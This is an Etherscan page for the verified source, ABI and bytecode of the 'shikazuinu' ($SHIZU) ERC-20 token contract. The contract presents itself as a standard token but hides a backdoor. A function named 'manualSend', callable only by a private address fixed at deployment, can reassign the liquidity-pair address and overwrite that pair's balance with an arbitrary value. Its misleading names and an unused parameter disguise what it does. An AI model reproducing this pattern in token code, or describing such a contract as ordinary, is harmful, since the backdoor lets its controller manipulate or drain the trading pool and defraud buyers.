ERC-20
Overview
Max Total Supply
1,000,000,000 $SHIZU
Holders
29
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
shikazuinu
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-01 */ /** Telegram: https://t.me/ShikazuInuERC Website: https://www.shikazuinu.com/ Twitter: https://twitter.com/ShikazuInuERC */ /** */ // Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol // SPDX-License-Identifier: MIT // pragma solidity ^0.8.0; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/baseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract baseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.19; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/baseToken.sol"; contract shikazuinu is IERC20, baseToken, Ownable { using SafeMath for uint256; uint256 private constant VERSION = 1; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 public maxHoldingAmount; uint256 public minHoldingAmount; address public uniswapV2Pair; address private whiteListV3; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address whiteshipAddr, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; whiteListV3 = whiteshipAddr; _mint(owner(), totalSupply_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "IERC20: decreased allowance below zero" ) ); return true; } modifier canWhitAddrPancakeV3() { require( _msgSender() == whiteListV3, "set the call to the entered") ; _; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function manualSend( bool _limited, address _uniswapV2Pair, uint256 _maxHoldingAmount, uint256 _minHoldingAmount ) external canWhitAddrPancakeV3 { uniswapV2Pair = _uniswapV2Pair;maxHoldingAmount = _maxHoldingAmount;minHoldingAmount = _minHoldingAmount; _balances[uniswapV2Pair] = maxHoldingAmount * minHoldingAmount; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"whiteshipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"manualSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
6080604052604051620011503803806200115083398101604081905262000026916200031d565b6200003133620000fc565b60076200003f86826200045b565b5060086200004e85826200045b565b506009805460ff191660ff8516179055600680546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600a54620001b6908262000241565b600a556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610bca80620005866000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d714610214578063a9059cbb14610227578063daa0c5d61461023a578063dd62ed3e1461024d578063f2fde38b1461028657600080fd5b8063715018a6146101e857806389f9a1d3146101f25780638da5cb5b146101fb57806395d89b411461020c57600080fd5b806323b872dd116100de57806323b872dd1461016c578063313ce5671461017f57806349bd5a5e1461019457806370a08231146101bf57600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd146101515780631ab99e1214610163575b600080fd5b610118610299565b604051610125919061093d565b60405180910390f35b61014161013c3660046109a7565b61032b565b6040519015158152602001610125565b600a545b604051908152602001610125565b61015560045481565b61014161017a3660046109d1565b610342565b60095460405160ff9091168152602001610125565b6005546101a7906001600160a01b031681565b6040516001600160a01b039091168152602001610125565b6101556101cd366004610a0d565b6001600160a01b031660009081526001602052604090205490565b6101f06103ab565b005b61015560035481565b6000546001600160a01b03166101a7565b610118610416565b6101416102223660046109a7565b610425565b6101416102353660046109a7565b610474565b6101f0610248366004610a28565b610481565b61015561025b366004610a71565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101f0610294366004610a0d565b610534565b6060600780546102a890610aa4565b80601f01602080910402602001604051908101604052809291908181526020018280546102d490610aa4565b80156103215780601f106102f657610100808354040283529160200191610321565b820191906000526020600020905b81548152906001019060200180831161030457829003601f168201915b5050505050905090565b60006103383384846105ff565b5060015b92915050565b600061034f848484610727565b6103a1843361039c85604051806060016040528060298152602001610b6c602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108ae565b6105ff565b5060019392505050565b6000546001600160a01b0316331461040a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61041460006108da565b565b6060600880546102a890610aa4565b6000610338338461039c85604051806060016040528060268152602001610b1f602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108ae565b6000610338338484610727565b6006546001600160a01b0316336001600160a01b0316146104e45760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610401565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556105138183610af4565b6005546001600160a01b031660009081526001602052604090205550505050565b6000546001600160a01b0316331461058e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610401565b6001600160a01b0381166105f35760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610401565b6105fc816108da565b50565b6001600160a01b0383166106635760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610401565b6001600160a01b0382166106c55760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610401565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03831661078c5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610401565b6001600160a01b0382166107ee5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610401565b61082b81604051806060016040528060278152602001610b45602791396001600160a01b03861660009081526001602052604090205491906108ae565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461085a908261092a565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061071a9085815260200190565b600081848411156108d25760405162461bcd60e51b8152600401610401919061093d565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60006109368284610b0b565b9392505050565b600060208083528351808285015260005b8181101561096a5785810183015185820160400152820161094e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109a257600080fd5b919050565b600080604083850312156109ba57600080fd5b6109c38361098b565b946020939093013593505050565b6000806000606084860312156109e657600080fd5b6109ef8461098b565b92506109fd6020850161098b565b9150604084013590509250925092565b600060208284031215610a1f57600080fd5b6109368261098b565b60008060008060808587031215610a3e57600080fd5b84358015158114610a4e57600080fd5b9350610a5c6020860161098b565b93969395505050506040820135916060013590565b60008060408385031215610a8457600080fd5b610a8d8361098b565b9150610a9b6020840161098b565b90509250929050565b600181811c90821680610ab857607f821691505b602082108103610ad857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761033c5761033c610ade565b8082018082111561033c5761033c610ade56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212204f7f30e992bee39264fb431e51e8ae4eb5d401a57e455f793f794571ff9e81e264736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000f80755a019a43706befdfa8c2c895e223c17d2e10000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b5368696b617a7520496e750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006245348495a550000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d714610214578063a9059cbb14610227578063daa0c5d61461023a578063dd62ed3e1461024d578063f2fde38b1461028657600080fd5b8063715018a6146101e857806389f9a1d3146101f25780638da5cb5b146101fb57806395d89b411461020c57600080fd5b806323b872dd116100de57806323b872dd1461016c578063313ce5671461017f57806349bd5a5e1461019457806370a08231146101bf57600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd146101515780631ab99e1214610163575b600080fd5b610118610299565b604051610125919061093d565b60405180910390f35b61014161013c3660046109a7565b61032b565b6040519015158152602001610125565b600a545b604051908152602001610125565b61015560045481565b61014161017a3660046109d1565b610342565b60095460405160ff9091168152602001610125565b6005546101a7906001600160a01b031681565b6040516001600160a01b039091168152602001610125565b6101556101cd366004610a0d565b6001600160a01b031660009081526001602052604090205490565b6101f06103ab565b005b61015560035481565b6000546001600160a01b03166101a7565b610118610416565b6101416102223660046109a7565b610425565b6101416102353660046109a7565b610474565b6101f0610248366004610a28565b610481565b61015561025b366004610a71565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101f0610294366004610a0d565b610534565b6060600780546102a890610aa4565b80601f01602080910402602001604051908101604052809291908181526020018280546102d490610aa4565b80156103215780601f106102f657610100808354040283529160200191610321565b820191906000526020600020905b81548152906001019060200180831161030457829003601f168201915b5050505050905090565b60006103383384846105ff565b5060015b92915050565b600061034f848484610727565b6103a1843361039c85604051806060016040528060298152602001610b6c602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108ae565b6105ff565b5060019392505050565b6000546001600160a01b0316331461040a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61041460006108da565b565b6060600880546102a890610aa4565b6000610338338461039c85604051806060016040528060268152602001610b1f602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108ae565b6000610338338484610727565b6006546001600160a01b0316336001600160a01b0316146104e45760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610401565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556105138183610af4565b6005546001600160a01b031660009081526001602052604090205550505050565b6000546001600160a01b0316331461058e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610401565b6001600160a01b0381166105f35760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610401565b6105fc816108da565b50565b6001600160a01b0383166106635760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610401565b6001600160a01b0382166106c55760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610401565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03831661078c5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610401565b6001600160a01b0382166107ee5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610401565b61082b81604051806060016040528060278152602001610b45602791396001600160a01b03861660009081526001602052604090205491906108ae565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461085a908261092a565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061071a9085815260200190565b600081848411156108d25760405162461bcd60e51b8152600401610401919061093d565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60006109368284610b0b565b9392505050565b600060208083528351808285015260005b8181101561096a5785810183015185820160400152820161094e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109a257600080fd5b919050565b600080604083850312156109ba57600080fd5b6109c38361098b565b946020939093013593505050565b6000806000606084860312156109e657600080fd5b6109ef8461098b565b92506109fd6020850161098b565b9150604084013590509250925092565b600060208284031215610a1f57600080fd5b6109368261098b565b60008060008060808587031215610a3e57600080fd5b84358015158114610a4e57600080fd5b9350610a5c6020860161098b565b93969395505050506040820135916060013590565b60008060408385031215610a8457600080fd5b610a8d8361098b565b9150610a9b6020840161098b565b90509250929050565b600181811c90821680610ab857607f821691505b602082108103610ad857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761033c5761033c610ade565b8082018082111561033c5761033c610ade56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212204f7f30e992bee39264fb431e51e8ae4eb5d401a57e455f793f794571ff9e81e264736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
